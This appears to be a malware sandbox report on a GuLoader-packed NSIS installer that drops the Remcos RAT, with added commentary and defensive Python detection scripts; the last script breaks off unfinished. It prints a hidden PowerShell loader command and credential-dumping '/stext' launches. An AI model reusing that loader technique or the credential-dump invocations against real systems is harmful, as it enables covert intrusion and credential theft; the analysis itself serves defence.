                                                                  Commandline:powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
                                                                  Imagebase:0x7d0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:10:28:05
                                                                  Start date:10/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7b4ee0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:11:45:06
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Juryen.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 18%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:13
                                                                  Start time:11:45:18
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:14
Start time: 11:45:18
Start date: 10/12/2024
Path: C:\Users\user\AppData\Local\Temp\Juryen.exe
Wow64 process (32bit): true
Commandline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"
Imagebase: 0x400000
File size: 795'710 bytes
MD5 hash: 82BA32E4800897E8BAFB32990D29F60A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 15
Start time: 11:45:18
Start date: 10/12/2024
Path: C:\Users\user\AppData\Local\Temp\Juryen.exe
Wow64 process (32bit): true
Commandline: C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"
Imagebase: 0x400000
File size: 795'710 bytes
MD5 hash: 82BA32E4800897E8BAFB32990D29F60A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true
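The two Juryen.exe entries above are byte-identical copies (same MD5, same image base) started within the same second, each with `/stext <file>`, the switch NirSoft's password-recovery tools accept to write their results to a plain-text file; the only difference is the randomly named output file under the user's Temp directory. Note also that the command line uses the 8.3 short-name form `user~1` while the Path field shows the long form, so an exact-string rule keyed on the long path misses the launch. The following detection sketch is an added example, not part of the Joe Sandbox report: it parses process-creation records, flags NirSoft save switches, scores the surrounding indicators, and groups flagged children by parent to catch the burst pattern. The two Juryen.exe command lines are copied from the report; the PIDs, parent PID, timestamps and the two control events are constructed because the excerpt does not carry them.

```python
"""Flag NirSoft-style credential dumps launched as child processes.

Added detection example; not part of the Joe Sandbox report. The two Juryen.exe
command lines are copied from the report; PIDs, parent PID and timestamps are
constructed because the report excerpt does not carry them.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# NirSoft "save report" switches. /stext writes recovered credentials as plain text.
NIRSOFT_SAVE = re.compile(
    r'(?<!\S)/(stext|stabular|stab|scomma|shtml|sverhtml|sxml|sjson)\s+(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)
# %LOCALAPPDATA%\Temp for any user, tolerant of 8.3 short names such as "user~1".
TEMP_DIR = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE)
# 8.3 short-name path component (e.g. "user~1"); exact matches on the long path miss it.
SHORT_NAME = re.compile(r"[^\\]{1,6}~\d+")
# Heuristic: extension-less output name of 16+ letters, as in the report's temp files.
RANDOM_NAME = re.compile(r"\\[a-z]{16,}$", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable, as the sensor reports it
    cmdline: str    # command line as launched
    t: float        # seconds since start of capture


def classify(ev: ProcEvent) -> Optional[Dict[str, object]]:
    """Return indicator flags if the command line uses a NirSoft save switch, else None."""
    m = NIRSOFT_SAVE.search(ev.cmdline)
    if not m:
        return None
    outpath = m.group(2) or m.group(3)
    return {
        "pid": ev.pid,
        "switch": m.group(1).lower(),
        "outpath": outpath,
        "image_in_temp": bool(TEMP_DIR.search(ev.image)),
        "out_in_temp": bool(TEMP_DIR.search(outpath)),
        "short_name_path": bool(SHORT_NAME.search(ev.cmdline)),
        "random_outname": bool(RANDOM_NAME.search(outpath)),
    }


def score(flags: Dict[str, object]) -> int:
    """Number of suspicious indicators set (0-4); the switch alone is not an alert."""
    keys = ("image_in_temp", "out_in_temp", "short_name_path", "random_outname")
    return sum(int(bool(flags[k])) for k in keys)


def find_harvest_bursts(events: List[ProcEvent], window: float = 5.0, min_outputs: int = 2):
    """Group flagged children by (parent, image). A burst is >= min_outputs distinct
    dump files written within `window` seconds: one host process running several
    recovery tools back to back, as the two Juryen.exe launches show."""
    by_parent = defaultdict(list)
    for ev in events:
        flags = classify(ev)
        if flags:
            by_parent[(ev.ppid, ev.image.lower())].append((ev.t, str(flags["outpath"]).lower()))
    bursts = []
    for (ppid, image), items in by_parent.items():
        items.sort()
        t0 = items[0][0]
        outputs = sorted({out for t, out in items if t - t0 <= window})
        if len(outputs) >= min_outputs:
            bursts.append({"ppid": ppid, "image": image, "outputs": outputs})
    return bursts


# Constructed sample: the two Juryen.exe command lines are verbatim from the report;
# the cmd.exe and WebBrowserPassView.exe lines are controls (an admin running the
# tool from a normal location with a normal output name should score low).
JURYEN = r"C:\Users\user\AppData\Local\Temp\Juryen.exe"
SAMPLE_EVENTS = [
    ProcEvent(4001, 3000, JURYEN,
              r'C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"', 0.0),
    ProcEvent(4002, 3000, JURYEN,
              r'C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"', 0.2),
    ProcEvent(5001, 900, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c dir "C:\Users\user\AppData\Local\Temp"', 1.0),
    ProcEvent(5002, 900, r"C:\Tools\WebBrowserPassView.exe",
              r'WebBrowserPassView.exe /shtml "C:\Users\admin\Desktop\report.html"', 2.0),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flags = classify(ev)
        if flags:
            print(f"pid {ev.pid}: /{flags['switch']} -> {flags['outpath']} (score {score(flags)})")
    for b in find_harvest_bursts(SAMPLE_EVENTS):
        print(f"burst under ppid {b['ppid']}: {len(b['outputs'])} dump files from {b['image']}")
```

The switch itself is not the alert: NirSoft tools are legitimately run by administrators, so the score combines where the image lives, where the dump lands, the short-name path form and the extension-less random output name, and the burst grouping adds the "several dumps from one parent within seconds" shape. In the constructed sample the two report-derived launches score 4 of 4 and form one burst, while the WebBrowserPassView control scores 0 and stands alone.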


Execution Graph

Execution Coverage: 19%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17%
Total number of Nodes: 1371
Total number of Limit Nodes: 24

[Execution graph: the interactive node/edge dump (node id, routine address, API name, edges of the form "3236->3237") is omitted here; it continues past the end of this excerpt. Recoverable content: the graphed routines lie in the 0x401000-0x4074xx range of the 0x400000 image and call, among others, GlobalAlloc/GlobalFree; lstrcpynW/lstrcatW/lstrlenW; WideCharToMultiByte/MultiByteToWideChar; RegOpenKeyExW/RegQueryValueExW/RegEnumKeyW/RegEnumValueW/RegDeleteKeyW/RegDeleteValueW/RegCloseKey; GetTempPathW/GetTempFileNameW/GetWindowsDirectoryW/GetSystemDirectoryW/GetShortPathNameW/ExpandEnvironmentStringsW/SearchPathW; GetFileAttributesW/SetFileAttributesW/CreateFileW/ReadFile/WriteFile/SetFilePointer/CreateDirectoryW/DeleteFileW/CopyFileW/MoveFileExW/FindFirstFileW/FindNextFileW/SetCurrentDirectoryW; GetModuleHandleA/LoadLibraryExW/GetProcAddress/FreeLibrary; CreateProcessW/WaitForSingleObject/GetExitCodeProcess/ShellExecuteExW; GetCurrentProcess/OpenProcessToken/LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx/ExitProcess; SetErrorMode/GetVersionExW/GetCommandLineW/SetEnvironmentVariableW; GetPrivateProfileStringW/WritePrivateProfileStringW; OleInitialize/CoCreateInstance/IIDFromString/SHGetPathFromIDListW/SHGetFileInfoW; OpenClipboard/SetClipboardData; and the window and dialog APIs (RegisterClassW, CreateWindowExW, DialogBoxParamW, CreateDialogParamW, SendMessageW, SendMessageTimeoutW, FindWindowExW, MessageBoxIndirectW).]
3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 2 API calls 
4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW SetWindowLongW 4655 
40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 4023->4024 4025 4024db 
4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 4773 405e5c 2 API calls 
4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 4839->4842 4843 40555a 
4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0: function starting at 0040351C (entry block 40351c-40356e: SetErrorMode, GetVersionExW; terminates in ExitProcess at 403b2f-403b33). Node/edge data for the interactive renderer omitted; the APIs called from this function are listed below.
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 0040353F
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                    • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ 008191.exe",00000020,"C:\Users\user\Desktop\RFQ 008191.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                    • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                    • wsprintfW.USER32 ref: 0040399B
                                                                    • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039CE
                                                                    • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A08
                                                                      • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                    • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                      • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                      • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                      • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                      • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                    • ExitProcess.KERNEL32 ref: 00403A89
                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                    • ExitProcess.KERNEL32 ref: 00403B33
                                                                      • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
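The API sequence above is the stock NSIS stub's startup path rather than anything GuLoader-specific: SetErrorMode and GetVersionExW, OleInitialize, temp-directory selection with the TEMP/TMP environment overrides, then a CopyFileW of the installer into Temp under the `~nsu%X.tmp` name followed by CreateProcessW on that copy. The `NSIS Error` and `Error launching installer` strings belong to the same stub. When triaging a report like this it helps to pull the API list into structured records and flag the copy-then-execute pattern mechanically. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling; its sample input is a subset of the API lines copied from the list above, and the line grammar it assumes is inferred from those lines only.

```python
import re
from collections import Counter

# Constructed sample: API lines copied verbatim from the report's list above
# (enough to cover a "Part of subcall" line and lines with no argument list).
SAMPLE = r"""
• SetErrorMode.KERNELBASE ref: 0040353F
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
• GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
• GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
• CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A1E
  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
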